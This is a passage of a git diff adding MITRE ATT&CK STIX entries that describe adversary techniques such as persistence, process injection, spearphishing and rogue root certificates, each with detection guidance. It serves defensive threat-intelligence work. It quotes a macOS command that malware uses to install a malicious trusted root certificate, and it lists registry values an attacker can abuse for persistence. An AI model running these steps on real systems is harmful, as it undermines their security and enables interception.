In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json new file mode 100644 index 0000000000000000000000000000000000000000..5c138982808294c5f0f9f3a99e68568351076ea9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--e9f4a89c-586c-4f67-832b-3945e0246dde", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "created": "2020-03-11T14:13:42.916Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1195.001", + "url": "https://attack.mitre.org/techniques/T1195/001" + }, + { + "source_name": "Trendmicro NPM Compromise", + "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets", + "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "modified": "2022-04-28T16:03:59.172Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise Software Dependencies and Development Tools", + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. 
Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json new file mode 100644 index 0000000000000000000000000000000000000000..ca9815b3a49794862540b0552082c6ec01cc9bb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--d64e41e1-21ac-49c2-92b2-9795e0acc1a8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", + "type": "attack-pattern", + "created": "2020-10-01T02:14:18.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.004", + "url": "https://attack.mitre.org/techniques/T1588/004" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + }, + { + "source_name": "Let's Encrypt FAQ", + "url": "https://letsencrypt.org/docs/faq/", + "description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020." + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020." + }, + { + "source_name": "Recorded Future Beacon Certificates", + "url": "https://www.recordedfuture.com/cobalt-strike-servers/", + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020." + } + ], + "modified": "2021-10-16T17:44:09.486Z", + "name": "Digital Certificates", + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. 
They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. 
In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Certificate: Certificate Registration", + "Internet Scan: Response Content" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json new file mode 100644 index 0000000000000000000000000000000000000000..ee1dfc53fb73857bf6a304e6234937190104a51a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8892d38c-048c-4efb-9762-9b2c14ea500a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", + "type": "attack-pattern", + "created": "2020-10-01T00:40:45.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.002", + "url": "https://attack.mitre.org/techniques/T1583/002" + }, + { + "source_name": "Unit42 DNS Mar 2019", + "url": "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/", + "description": "Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can be (ab)used by malicious actors. Retrieved October 3, 2020." + } + ], + "modified": "2021-04-15T02:49:49.702Z", + "name": "DNS Server", + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). 
With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json new file mode 100644 index 0000000000000000000000000000000000000000..1b087a2ab0fba71b9c40f2fbe5492b57ce1115a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf.json 
@@ -0,0 +1,72 @@
+{
+ "type": "bundle",
+ "id": "bundle--1e45ec1c-5cc9-4365-ad2c-5ca4597420ba",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-21T12:31:54.177Z",
+ "name": "Screensaver",
+ "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "x_mitre_contributors": [
+ "Bartosz Jerzman"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. 
Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_data_sources": [
+ "Process: Process Creation",
+ "Command: Command Execution",
+ "Windows Registry: Windows Registry Key Modification",
+ "File: File Creation",
+ "File: File Modification"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf",
+ "created": "2020-01-24T13:51:01.210Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1546/002",
+ "external_id": "T1546.002"
+ },
+ {
+ "source_name": "ESET Gazer Aug 2017",
+ "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"
+ },
+ {
+ "source_name": "Wikipedia Screensaver",
+ "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.",
+ "url": "https://en.wikipedia.org/wiki/Screensaver"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json
new file mode 100644
index 0000000000000000000000000000000000000000..80cce364a89ab3f061fbe152714da4cbea222a36
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591.json 
@@ -0,0 +1,68 @@
+{
+ "type": "bundle",
+ "id": "bundle--f5dde153-0101-4fd1-9cbb-b3d32af2ba94",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
+ "type": "attack-pattern",
+ "created": "2020-01-14T01:34:10.588Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1055.009",
+ "url": "https://attack.mitre.org/techniques/T1055/009"
+ },
+ {
+ "url": "http://hick.org/code/skape/papers/needle.txt",
+ "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.",
+ "source_name": "Uninformed Needle"
+ },
+ {
+ "source_name": "GDS Linux Injection",
+ "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html",
+ "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020."
+ },
+ {
+ "source_name": "DD Man",
+ "url": "http://man7.org/linux/man-pages/man1/dd.1.html",
+ "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020."
+ }
+ ],
+ "modified": "2020-06-20T22:25:55.331Z",
+ "name": "Proc Memory",
+ "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. 
Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "x_mitre_detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json new file mode 100644 index 0000000000000000000000000000000000000000..ec744151c9f4e7ed170d4cc879538a89422071fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847.json 
@@ -0,0 +1,50 @@
+{
+ "type": "bundle",
+ "id": "bundle--f25edfba-ab69-4ee8-9928-ba59613d752e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "attack-pattern--d3df754e-997b-4cf9-97d4-70feb3120847",
+ "type": "attack-pattern",
+ "created": "2018-04-18T17:59:24.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": true,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1194",
+ "external_id": "T1194"
+ },
+ {
+ "external_id": "CAPEC-163",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/163.html"
+ }
+ ],
+ "modified": "2020-03-02T19:30:53.487Z",
+ "name": "Spearphishing via Service",
+ "description": "Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. 
The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_is_subtechnique": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json
new file mode 100644
index 0000000000000000000000000000000000000000..32ce9411160abb36d54e18537783f6424988571f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1.json
@@ -0,0 +1,98 @@
+{
+ "type": "bundle",
+ "id": "bundle--393f730f-09d1-4434-a4d2-0b740b463217",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach",
+ "Travis Smith, Tripwire",
+ "Red Canary",
+ "Matt Graeber, @mattifestation, SpecterOps"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
+ "type": "attack-pattern",
+ "created": "2017-05-31T21:31:42.750Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": true,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1130",
+ "url": "https://attack.mitre.org/techniques/T1130"
+ },
+ {
+ "external_id": "CAPEC-479",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/479.html"
+ },
+ {
+ "url": "https://en.wikipedia.org/wiki/Root_certificate",
+ "description": "Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.",
+ "source_name": "Wikipedia Root Certificate"
+ },
+ {
+ "url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf",
+ "description": "Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.",
+ "source_name": "Operation Emmental"
+ },
+ {
+ "url": "https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/",
+ "description": "Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.",
+ "source_name": "Kaspersky Superfish"
+ },
+ {
+ "source_name": "SpectorOps Code Signing Dec 2017",
+ "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. 
Retrieved April 3, 2018.",
+ "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec"
+ },
+ {
+ "source_name": "objective-see ay mami 2018",
+ "description": "Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.",
+ "url": "https://objective-see.com/blog/blog_0x26.html"
+ },
+ {
+ "source_name": "Microsoft Sigcheck May 2017",
+ "description": "Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.",
+ "url": "https://docs.microsoft.com/sysinternals/downloads/sigcheck"
+ },
+ {
+ "url": "https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/",
+ "description": "Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.",
+ "source_name": "Tripwire AppUNBlocker"
+ }
+ ],
+ "modified": "2020-02-21T21:11:06.761Z",
+ "name": "Install Root Certificate",
+ "description": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. 
(Citation: Operation Emmental)\n\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "x_mitre_detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. 
(Citation: Microsoft Sigcheck May 2017)\n\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies\\]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)\n\n* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25\n* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85\n* 3B1EFD3A66EA28B16697394703A72CA340A05BD5\n* 7F88CD7223F3C813818C994614A89C99FA3B5247\n* 8F43288AD272F3103B6FB1428485EA3014C0BCFE\n* A43489159A520F0D93D032CCAF37E7FE20A8B419\n* BE36A4562FB2EE05DBB3D32323ADF445084ED656\n* CDD4EEAE6000AC7F40C3802C171E30148030C072",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_is_subtechnique": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json
new file mode 100644
index 0000000000000000000000000000000000000000..dc8aa116b139eaa82bfd14ff7807edb406b33744
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211.json
@@ -0,0 +1,91 @@
+{
+ "type": "bundle",
+ "id": "bundle--7fee3bce-756d-4593-94d2-248b9c714adb",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211",
+ "type": "attack-pattern",
+ "created": "2020-01-15T16:25:22.260Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1037.004",
